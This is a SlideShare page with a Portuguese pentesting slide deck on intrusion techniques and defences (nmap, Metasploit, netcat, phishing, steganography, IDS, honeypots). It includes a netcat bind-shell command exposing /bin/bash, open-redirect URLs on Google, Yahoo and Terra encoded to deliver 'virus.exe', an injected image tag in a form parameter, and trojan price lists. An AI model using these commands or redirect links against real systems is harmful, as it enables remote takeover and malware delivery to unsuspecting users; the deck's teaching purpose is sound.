SlideShare une entreprise Scribd logo
1  sur  44
PENTEST
Técnicas de invasão e defesa




            Por AnonFeh
         www.phillipewebdesigner.com
           www.virtuasolucoes.com
Tópicos
• Técnicas de         • Técnicas contra
  Invasão               Invasão
• Definindo um alvo   • Firewall + IDS
• Recolhendo          • HIDS
  informações         • HoneyPots
• Ferramentas úteis   • Antispam
• Phishing
• Esteganografia
Técnicas de invasão
•   Engenharia social
•   Brute Force
•   Espionagem
•   Segurança por obscuridade
Definindo um alvo
•   Onde buscar informações?
•   google
•   myspace
•   orkut
•   google groups
Google
• Buscas específicas
• Utilizando recursos avançados do google
  como
• as tags Intitle, Inurl, Intext
• Podem te trazer resultados muito
  interessantes.
Engenharia social
                 Ferramentas úteis
•   google               •   john the ripper
•   dig                  •   host
•   nmap                 •   hping3
•   nessus               •   netcat
•   Metasploit
•   telnet
•   sendip
Dig

• Uma ferramenta similar ou nslookup
  porém mais flexível, pode ser utilizada
  para fazer buscas como A,TXT, MX e NS.
dig +qr google.com any
•   ;; ANSWER SECTION:          NS ns3.google.com.          ;; ADDITIONAL SECTION:
•   google.com. 10186 IN    •   google.com. 318637 IN   •     smtp1.google.com. 2986
    MX 10                       NS ns4.google.com.            IN A 72.14.203.25
    smtp2.google.com.       •   ;; AUTHORITY SECTION:   •     smtp2.google.com. 2986
•   google.com. 10186 IN    •   google.com. 318637 IN         IN A 64.233.167.25
    MX 10                       NS ns2.google.com.      •     smtp3.google.com. 2986
    smtp3.google.com.       •   google.com. 318637 IN         IN A 64.233.183.25
•   google.com. 10186 IN        NS ns3.google.com.      •     smtp4.google.com. 2986
    MX 10                   •   google.com. 318637 IN         IN A 72.14.215.25
    smtp4.google.com.           NS ns4.google.com.      •     ns1.google.com. 345220
•   google.com. 10186 IN    •   google.com. 318637 IN         IN A 216.239.32.10
    MX 10                       NS ns1.google.com.      •     ns2.google.com. 345220
    smtp1.google.com.                                         IN A 216.239.34.10
•   google.com. 318637 IN                               •     ns3.google.com. 345219
    NS ns1.google.com.                                        IN A 216.239.36.10
•   google.com. 318637 IN                               •     ns4.google.com. 345219
    NS ns2.google.com.                                        IN A 216.239.38.10
•   google.com. 318637 IN
PortScan
Nmap
• é o mais famoso portscan existente hoje.
  (www.insecure.org/nmap). É uma ótima
  ferramenta, muito utilizado por hackers,
  para descobrir falhas no sistema, em
  portas abertas desnecessariamente.
Nessus
• O Nessus é uma ferramenta de auditoria
  muito usada para detectar e corrigir
  vulnerabilidades nos PCs da rede local
  porem é muito utilizado por hackers para
  descobrir a vulnerabilidade de um alvo.
Reports
Metasploit
• é um ambiente utilizado para escrever,
  testar, e executa códigos de exploit. Foi
  desenvolvido para prover penetração e
  testes em computadores relacionados a
  esse assunto, como também pesquisa de
  vulnerabilidade.
• Metasploit
• Linha de comando
• Interface web
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br80
•   Trying 200.189.171.181...
•   Connected to www.alvo.com.br.
•   Escape character is '^]'.
•   GET / HTTP/1.1
•   Host: www.alvo.com.br
Resultado
• Server: Microsoft-IIS/5.0
• X-Powered-By: ASP.NET
• Content-Location:
  http://www.alvo.com.br/index.htm
• Date: Thu, 01 Nov 2007 13:26:39 GMT
• Content-Type: text/html
• Accept-Ranges: bytes
• Last-Modified: Tue, 19 Sep 2006 00:27:32
  GMT
John The Ripper
Um programa usado para decifrar senhas
suportado nas plataformas UNIX, DOS,
WinNT?/Win95. É um programa disponível
gratuitamente desenvolvido para decifrar
senhas MD5, DES baseado na função
CRYPT.
hping3
• Mais uma ferramenta capaz de enviar
  pacotes TCP, UDP e ICMP personalizados
  e receber respostas como consegue em
  icmp. Com ele você pode enviar arquivos
  encapsulados e é util para ataques DoS.
netcat
• Programa para consultoria de redes muito
  conhecido, isso deve-se ao fato de ele ser
  um programa muito versátil, podendo
  desde ser um simples telnet, portscan até
  um sniffer.
netcat
• nc -l -e /bin/bash -p 1033

• A porta 1033 será colocada em listenning,
  redirecionaremos a saída de dados para
  um shell (/bin/bash). Assim quando
  alguém se conectar a essa porta terá
  domínio total sobre o computador.
Sniffer
• # nc -vv -z 75.126.176.71 -p 80 22 110 25 21
• servidor9.molservidores.com [75.126.176.71]
  22 (ssh) : Connection refused
• servidor9.molservidores.com [75.126.176.71]
  110 (pop3) open
• servidor9.molservidores.com [75.126.176.71]
  25 (smtp) open
• servidor9.molservidores.com [75.126.176.71]
  21 (ftp) open
Phishing
                O que é phishing?



• Phishing é um tipo de fraude projetada
  para roubar sua identidade. Em um
  phishing scam, uma pessoa mal-
  intencionada tenta obter informações
  como números de cartões de crédito,
  senhas, dados de contas ou outras
  informações pessoais convencendo você
  a fornecê-las sob pretextos enganosos.
Exemplos de Phishing
• Alguns sites famosos que permitem este
  tipo de fake:
• google
• yahoo
• terra
Google
• http://www.google.com/pagead/iclk?sa=l&ai=
  Br3ycNQz5Q-
  fXBJGSiQLU0eDSAueHkArnhtWZAu-
  FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-
  P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NL
  QH0sz4&num=5&adurl=%63%6c%65%62%65
  %65%72%2e%6e%6f%2d%69%70%2e%6f%72
  %67%2f%76%69%72%75%73%2e%65%78%65
Yahoo
• http://br.wrs.yahoo.com/_ylt=A0geum1Mv9R
  Gw4EB6FXz6Qt./SIG=129lovkbd/EXP=118843
  4124/**%63%6c%65%62%65%65%72%2e%6e
  %6f%2d%69%70%2e%6f%72%67%2f%76%69
  %72%75%73%2e%65%78%65
Buscador terra
• http://buscador.terra.com.br/Redirector.aspx?
  bstat=terrastats01&type=CK&source=buscado
  r.terra.com.br&id=sponsored&partner=google
  &query=nike&position=1&target=%63%6c%65
  %62%65%65%72%2e%6e%6f%2d%69%70%2e
  %6f%72%67%2f%76%69%72%75%73%2e%65
  %78%65
Destino???
• Nas 3 URLs anteriores a requisição seria
  encaminhada para:
clebeer.no-ip.org/virus.exe
Outro Exemplo

http://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Esteganografia
• Esteganografia basicamente é uma
  técnica de esconder um arquivo dentro de
  outro arquivo, podendo ser uma imagem ,
  ou documento do Word até mesmo uma
  planilha de excel e etc só que de uma
  forma criptografada.
jp(hide an seek)
• O jphide e o jpseek são programas
  utilizados para esconder mensagens em
  arquivos JPEG.
origem.jpg
destino.jpg
msg.txt
• Olá esta mensagem e secretae somente
  pessoas que possuam a senha podem vê-
  la senha:
  @@(##!(*#$#*(!(@&%$(@)codDEVdw)22
  31
Utilização
• Esconder mensagem:
• jphide origem.jpg destino.jpg
  mensagem.txt
• Descobir mensagem:
• jpseek destino.jpg texto-secreto.txt
Quanto vale?
Trojan (Shell) - US$ 350,00 - US$700,00
Trojan (Roubo de Senhas) - US$600,00
Listagem E-mail (32 milhões) - US$1.500,00
Milhões de Usuários do ICQ - US$150,00
Proteção Contra Detecção do Trojan -
US$20,00
Suporte
Tecnicas contra invasão

        • Firewall

       • (NHWK)IDS

       • HoneyPots

        • Antispam
Firewall
• Port Knock, uma solução leve e fácil de
  configurar, permite que portas específicas
  só sejam abertas no momento desejado
  atraves de tentativas de conexão em
  portas específicas.
*IDS

• NIDS – Network Intrusion Detection System

• HIDS -    Host-based    Intrusion   Detection
  System

• WIDS – Wireless Intrusion Detection System

• KIDS - Kernel Intrusion Detection System
Honeypot
• Útil para vigilância e alerta aos tipos de
  ataques mais utilizados porem deve ser
  utilizado com cuidado para que o invasor
  não tenha acesso a rede real.
Antispam
• Indispensável para qualquer MX, útil para
  evitar emails forjados e de domínios não
  confiaveis, pode ser incrementado com
  opções de RBL e CAPTCHA ("Completely
  Automated Public Turing test to tell
  Computers and Humans Apart").
Conclusão
• Com a popularidade do SL a informação
  ficou mais acessível o que colaborou para
  um maior avanço das técnicas de invasão,
  em contra partida os sistemas de
  segurança vem se tornando mais estáveis
  a casa dia.
Creditos
• Cartilha de Segurança - Códigos
  maliciosos (Malware)
• http://cartilha.cert.br/malware/

• BRConnection - Internet Controlada
• http://www.brc.com.br/

               AnonFeh
                  www.virtuasolucoes.com

Contenu connexe

Tendances

Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
Segurança em redes sem fio 2
Segurança em redes sem fio 2Segurança em redes sem fio 2
Segurança em redes sem fio 2Designer Info
 
Palestra - Fitem 2009 - Ferramentas de segurança OpenSource
Palestra - Fitem 2009 - Ferramentas de segurança OpenSourcePalestra - Fitem 2009 - Ferramentas de segurança OpenSource
Palestra - Fitem 2009 - Ferramentas de segurança OpenSourceLuiz Arthur
 
Infosec e pentesting - Escolha o seu lado!
Infosec e pentesting - Escolha o seu lado!Infosec e pentesting - Escolha o seu lado!
Infosec e pentesting - Escolha o seu lado!Leandro Magnabosco
 
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Luiz Arthur
 
Detecção de ameaças internas com Linux Audit
Detecção de ameaças internas com Linux AuditDetecção de ameaças internas com Linux Audit
Detecção de ameaças internas com Linux AuditIvani Nascimento
 
Mecanismos de detecção e prevenção de intrusos
Mecanismos de detecção e prevenção de intrusosMecanismos de detecção e prevenção de intrusos
Mecanismos de detecção e prevenção de intrusosIvani Nascimento
 
NSM (Network Security Monitoring) - Tecland Chapeco
NSM (Network Security Monitoring) - Tecland ChapecoNSM (Network Security Monitoring) - Tecland Chapeco
NSM (Network Security Monitoring) - Tecland ChapecoRodrigo Montoro
 
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...Analisando pacotes for fun and packet - Conceito de Network Security Monitori...
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...Rodrigo Montoro
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosSanger Dias
 
Proteção e segurança do Sistema Operacional
Proteção e segurança do Sistema OperacionalProteção e segurança do Sistema Operacional
Proteção e segurança do Sistema OperacionalAmanda Luz
 
Intrusos e Honeypots
Intrusos e HoneypotsIntrusos e Honeypots
Intrusos e HoneypotsThaís Favore
 

Tendances (20)

Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Pentest
Pentest Pentest
Pentest
 
Snort
SnortSnort
Snort
 
Segurança em redes sem fio 2
Segurança em redes sem fio 2Segurança em redes sem fio 2
Segurança em redes sem fio 2
 
Palestra - Fitem 2009 - Ferramentas de segurança OpenSource
Palestra - Fitem 2009 - Ferramentas de segurança OpenSourcePalestra - Fitem 2009 - Ferramentas de segurança OpenSource
Palestra - Fitem 2009 - Ferramentas de segurança OpenSource
 
NAPSOL
NAPSOLNAPSOL
NAPSOL
 
Infosec e pentesting - Escolha o seu lado!
Infosec e pentesting - Escolha o seu lado!Infosec e pentesting - Escolha o seu lado!
Infosec e pentesting - Escolha o seu lado!
 
Back track
Back trackBack track
Back track
 
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...
 
Webcast Luiz Vieira criptografia on-the-fly com software livre
Webcast Luiz Vieira criptografia on-the-fly com software livreWebcast Luiz Vieira criptografia on-the-fly com software livre
Webcast Luiz Vieira criptografia on-the-fly com software livre
 
Detecção de ameaças internas com Linux Audit
Detecção de ameaças internas com Linux AuditDetecção de ameaças internas com Linux Audit
Detecção de ameaças internas com Linux Audit
 
Mecanismos de detecção e prevenção de intrusos
Mecanismos de detecção e prevenção de intrusosMecanismos de detecção e prevenção de intrusos
Mecanismos de detecção e prevenção de intrusos
 
NSM (Network Security Monitoring) - Tecland Chapeco
NSM (Network Security Monitoring) - Tecland ChapecoNSM (Network Security Monitoring) - Tecland Chapeco
NSM (Network Security Monitoring) - Tecland Chapeco
 
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...Analisando pacotes for fun and packet - Conceito de Network Security Monitori...
Analisando pacotes for fun and packet - Conceito de Network Security Monitori...
 
Webinar # 21 – Análise Forense de Redes
 Webinar # 21 – Análise Forense de Redes Webinar # 21 – Análise Forense de Redes
Webinar # 21 – Análise Forense de Redes
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
 
Aula 8.0 - Segurança
Aula 8.0 - SegurançaAula 8.0 - Segurança
Aula 8.0 - Segurança
 
Proteção e segurança do Sistema Operacional
Proteção e segurança do Sistema OperacionalProteção e segurança do Sistema Operacional
Proteção e segurança do Sistema Operacional
 
Intrusos e Honeypots
Intrusos e HoneypotsIntrusos e Honeypots
Intrusos e Honeypots
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 

Similaire à Pentest Invasão e Defesa - AnonFeh

Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Marcelo Area Leao
 
RSA, A Vaca Sagrada do Infosec
RSA, A Vaca Sagrada do InfosecRSA, A Vaca Sagrada do Infosec
RSA, A Vaca Sagrada do InfosecLuis Grangeia
 
“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web HackingConviso Application Security
 
Google Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosGoogle Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosC H
 
Edge computing na prática com IoT, Machine Learning e Google Cloud
Edge computing na prática com IoT, Machine Learning e Google CloudEdge computing na prática com IoT, Machine Learning e Google Cloud
Edge computing na prática com IoT, Machine Learning e Google CloudAlvaro Viebrantz
 
Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”Jefferson Costa
 
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...BHack Conference
 
Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015C H
 
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...Adolfo Guimaraes
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5Cassio Ramos
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviJhonathan Davi
 
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )Rafael Biriba
 
Relatórios e estatísticas utilizando logs em tempo real
Relatórios e estatísticas utilizando logs em tempo realRelatórios e estatísticas utilizando logs em tempo real
Relatórios e estatísticas utilizando logs em tempo realFrancisco Freire
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...Magno Logan
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Publicar aplicações na deep web
Publicar aplicações na deep webPublicar aplicações na deep web
Publicar aplicações na deep webJuscélio Reis
 
IoT Usando Azure Como Backend
IoT Usando Azure Como BackendIoT Usando Azure Como Backend
IoT Usando Azure Como BackendJorge Maia
 

Similaire à Pentest Invasão e Defesa - AnonFeh (20)

Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
 
RSA, A Vaca Sagrada do Infosec
RSA, A Vaca Sagrada do InfosecRSA, A Vaca Sagrada do Infosec
RSA, A Vaca Sagrada do Infosec
 
“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking
 
H2HC University 2014
H2HC University 2014H2HC University 2014
H2HC University 2014
 
Bsides4cooler
Bsides4coolerBsides4cooler
Bsides4cooler
 
Google Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosGoogle Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivos
 
Edge computing na prática com IoT, Machine Learning e Google Cloud
Edge computing na prática com IoT, Machine Learning e Google CloudEdge computing na prática com IoT, Machine Learning e Google Cloud
Edge computing na prática com IoT, Machine Learning e Google Cloud
 
Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”
 
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
 
Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015Técnicas de Invasão - INFOESTE 2015
Técnicas de Invasão - INFOESTE 2015
 
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...
Minicurso: O que o twitter está pensando? Extraindo informações do twitter ut...
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan Davi
 
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )
Faculdade: Trabalho sobre Seguranca Digital ( Versão em Slides )
 
Relatórios e estatísticas utilizando logs em tempo real
Relatórios e estatísticas utilizando logs em tempo realRelatórios e estatísticas utilizando logs em tempo real
Relatórios e estatísticas utilizando logs em tempo real
 
Ransomware
RansomwareRansomware
Ransomware
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
Publicar aplicações na deep web
Publicar aplicações na deep webPublicar aplicações na deep web
Publicar aplicações na deep web
 
IoT Usando Azure Como Backend
IoT Usando Azure Como BackendIoT Usando Azure Como Backend
IoT Usando Azure Como Backend
 

Pentest Invasão e Defesa - AnonFeh

  • 1. PENTEST Técnicas de invasão e defesa Por AnonFeh www.phillipewebdesigner.com www.virtuasolucoes.com
  • 2. Tópicos • Técnicas de • Técnicas contra Invasão Invasão • Definindo um alvo • Firewall + IDS • Recolhendo • HIDS informações • HoneyPots • Ferramentas úteis • Antispam • Phishing • Esteganografia
  • 3. Técnicas de invasão • Engenharia social • Brute Force • Espionagem • Segurança por obscuridade
  • 4. Definindo um alvo • Onde buscar informações? • google • myspace • orkut • google groups
  • 5. Google • Buscas específicas • Utilizando recursos avançados do google como • as tags Intitle, Inurl, Intext • Podem te trazer resultados muito interessantes.
  • 6. Engenharia social Ferramentas úteis • google • john the ripper • dig • host • nmap • hping3 • nessus • netcat • Metasploit • telnet • sendip
  • 7. Dig • Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  • 8. dig +qr google.com any • ;; ANSWER SECTION: NS ns3.google.com. ;; ADDITIONAL SECTION: • google.com. 10186 IN • google.com. 318637 IN • smtp1.google.com. 2986 MX 10 NS ns4.google.com. IN A 72.14.203.25 smtp2.google.com. • ;; AUTHORITY SECTION: • smtp2.google.com. 2986 • google.com. 10186 IN • google.com. 318637 IN IN A 64.233.167.25 MX 10 NS ns2.google.com. • smtp3.google.com. 2986 smtp3.google.com. • google.com. 318637 IN IN A 64.233.183.25 • google.com. 10186 IN NS ns3.google.com. • smtp4.google.com. 2986 MX 10 • google.com. 318637 IN IN A 72.14.215.25 smtp4.google.com. NS ns4.google.com. • ns1.google.com. 345220 • google.com. 10186 IN • google.com. 318637 IN IN A 216.239.32.10 MX 10 NS ns1.google.com. • ns2.google.com. 345220 smtp1.google.com. IN A 216.239.34.10 • google.com. 318637 IN • ns3.google.com. 345219 NS ns1.google.com. IN A 216.239.36.10 • google.com. 318637 IN • ns4.google.com. 345219 NS ns2.google.com. IN A 216.239.38.10 • google.com. 318637 IN
  • 10. Nmap • é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  • 11. Nessus • O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  • 13. Metasploit • é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade. • Metasploit • Linha de comando • Interface web
  • 16. telnet www.alvo.com.br80 • Trying 200.189.171.181... • Connected to www.alvo.com.br. • Escape character is '^]'. • GET / HTTP/1.1 • Host: www.alvo.com.br
  • 17. Resultado • Server: Microsoft-IIS/5.0 • X-Powered-By: ASP.NET • Content-Location: http://www.alvo.com.br/index.htm • Date: Thu, 01 Nov 2007 13:26:39 GMT • Content-Type: text/html • Accept-Ranges: bytes • Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  • 18. John The Ripper Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
  • 19. hping3 • Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  • 20. netcat • Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  • 21. netcat • nc -l -e /bin/bash -p 1033 • A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  • 22. Sniffer • # nc -vv -z 75.126.176.71 -p 80 22 110 25 21 • servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused • servidor9.molservidores.com [75.126.176.71] 110 (pop3) open • servidor9.molservidores.com [75.126.176.71] 25 (smtp) open • servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  • 23. Phishing O que é phishing? • Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal- intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
  • 24. Exemplos de Phishing • Alguns sites famosos que permitem este tipo de fake: • google • yahoo • terra
  • 25. Google • http://www.google.com/pagead/iclk?sa=l&ai= Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NL QH0sz4&num=5&adurl=%63%6c%65%62%65 %65%72%2e%6e%6f%2d%69%70%2e%6f%72 %67%2f%76%69%72%75%73%2e%65%78%65
  • 26. Yahoo • http://br.wrs.yahoo.com/_ylt=A0geum1Mv9R Gw4EB6FXz6Qt./SIG=129lovkbd/EXP=118843 4124/**%63%6c%65%62%65%65%72%2e%6e %6f%2d%69%70%2e%6f%72%67%2f%76%69 %72%75%73%2e%65%78%65
  • 27. Buscador terra • http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscado r.terra.com.br&id=sponsored&partner=google &query=nike&position=1&target=%63%6c%65 %62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65 %78%65
  • 28. Destino??? • Nas 3 URLs anteriores a requisição seria encaminhada para: clebeer.no-ip.org/virus.exe
  • 31. Esteganografia • Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  • 32. jp(hide an seek) • O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  • 35. msg.txt • Olá esta mensagem e secretae somente pessoas que possuam a senha podem vê- la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)22 31
  • 36. Utilização • Esconder mensagem: • jphide origem.jpg destino.jpg mensagem.txt • Descobir mensagem: • jpseek destino.jpg texto-secreto.txt
  • 37. Quanto vale? Trojan (Shell) - US$ 350,00 - US$700,00 Trojan (Roubo de Senhas) - US$600,00 Listagem E-mail (32 milhões) - US$1.500,00 Milhões de Usuários do ICQ - US$150,00 Proteção Contra Detecção do Trojan - US$20,00 Suporte
  • 38. Tecnicas contra invasão • Firewall • (NHWK)IDS • HoneyPots • Antispam
  • 39. Firewall • Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  • 40. *IDS • NIDS – Network Intrusion Detection System • HIDS - Host-based Intrusion Detection System • WIDS – Wireless Intrusion Detection System • KIDS - Kernel Intrusion Detection System
  • 41. Honeypot • Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  • 42. Antispam • Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
  • 43. Conclusão • Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  • 44. Creditos • Cartilha de Segurança - Códigos maliciosos (Malware) • http://cartilha.cert.br/malware/ • BRConnection - Internet Controlada • http://www.brc.com.br/ AnonFeh www.virtuasolucoes.com